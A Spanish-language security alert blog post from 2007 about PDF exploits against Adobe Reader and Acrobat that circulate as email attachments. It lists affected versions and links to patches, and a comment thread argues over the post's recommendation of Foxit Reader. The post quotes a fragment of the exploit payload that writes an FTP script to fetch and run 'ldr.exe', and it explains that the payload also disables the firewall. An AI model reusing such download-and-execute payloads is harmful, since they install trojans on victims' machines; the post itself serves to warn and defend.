Skip to content

Alerta: Vulnerabilidades en productos Adobe (Exploits PDF in the wild)

Publicado por Sergio Hernando el 24 octubre 2007

Buenas,

Pese a que es un tema nada reciente y solucionado por el fabricante hace un par de días, parece que empieza a haber una cantidad ingente de exploits in the wild circulando, y la gente que no se ha enterado no ha actualizado. Así pues, me váis a permitir que emita la alerta.

Especialmente peligroso es que estos falsos documentos PDF se están enviando como adjuntos al correo pueden provocar familiaridad entre los receptores. El formato PDF siempre ha gozado de una falsa apariencia de seguridad entre los usuarios, ya que pese a ser un formato seguro, no siempre son seguros los clientes que permiten visualizar documentos portables. Los usuarios suelen confiar en PDF, asumiendo que nada malo les puede pasar.

Estos exploits están llegando a los buzones como adjuntos "BILL.pdf" y "INVOICE.pdf", aunque es factible que estos nombres se vayan permutando. El formato del exploit viene a ser parecido al siguiente:

obj< 1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/ URI>

En este ejemplo podemos comprobar que la carga maliciosa provoca la desactivación del firewall de Windows (netsh firewall set opmode mode=disable), la recogida de un FTP malicioso del fichero ldr.exe (get /ldr.exe) y su ejecución (start ldr.exe). Los espacios en la cadena expuesta están orientado a impedir que los antivirus detecten el patrón malicioso. Una vez instalado el fichero, no queda ahí la cosa: ldr.exe, o cualquiera que sea el ejecutable malicioso instalado aprovechando la vulnerabilidad descrita, será con toda probabilidad un huevo kinder con su correspondiente regalito: un troyano para robar credenciales, un control remoto para integrar la máquina en un botnet ... cualquier combinación es posible.

Para evitar problemas, actualizad siguiendo las recomendaciones de Adobe y no perdáis de vista lo que recomienda SANS. Os proporciono dos enlaces:

Parche para Acrobat
Parche para Acrobat Reader

Se confirma que son vulnerables: Adobe Reader 8.1 y anteriores, Adobe Reader 7.0.9 y anteriores, Adobe Acrobat Professional, 3D y Standard 8.1 y versiones anteriores, Adobe Acrobat Professional, Standard, 3D y Elements 7.0.9 y anteriores.

Los usuarios de Windows pueden recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad. Una opción muy recomendable es Foxit Reader. Si lo que quieréis es una aplicación libre para generar PDF, podéis emplear las herramientas Ghostscript.

NOTA IMPORTANTE: Sólo los usuarios de Windows XP con Internet Explorer 7 están afectados por la vulnerabilidad descrita.

Un saludo,

Be Sociable, Share!

Categoría/s → Alertas

6 comentarios
  1. 26 octubre 2007
    abc permalink

    Foxit reader tambien esta afectado.

  2. 26 octubre 2007
    abc permalink

    on the wild o “in the wild”???

  3. 27 octubre 2007

    abc,

    Gracias. Efectivamente es “in” :)

    De Foxit Reader no he visto nada. Por lo que pude ver era un problema exclusivo de los productos Adobe citados, aunque no tengo el 100% de garantías.

  4. 29 octubre 2007
    abc permalink

    Pues entonces no lo recomiendes si no sabes ni tienes 100% de garantías.

  5. 29 octubre 2007

    abc,

    La idea de recomendar el producto, y a ver si te molestas en leer antes de rajar, es recomendar un lector PDF que tal y como dice el artículo permita “recurrir a lectores PDF alternativos, y que por tanto, por menor grado de exposición, suelen protagonizar menos incidentes de seguridad”

    Si sabes leer, que parece que no sabes, verás que la recomendación es GENERAL, y con la idea de que la gente disponga de un producto menos expuesto, que además es más rápido y zampa menos memoria que Adobe Reader.

    En el momento de emitir la alerta no había (y sigue sin haber en fuentes confiables) confirmación de que Foxit 2.x sea vulnerable:

    http://secunia.com/product/12995/?task=advisories_2007

    De todos modos, mándame una nota de contacto, y la próxima vez que vaya a escribir te consulto antes si puedo o no puedo hablar de lo que estime conveniente.

    Sin acritud,

  6. 29 octubre 2007

Escribir un comentario

Note: XHTML permitido. Tu email nunca será publicado.

Suscribirse a los comentarios via RSS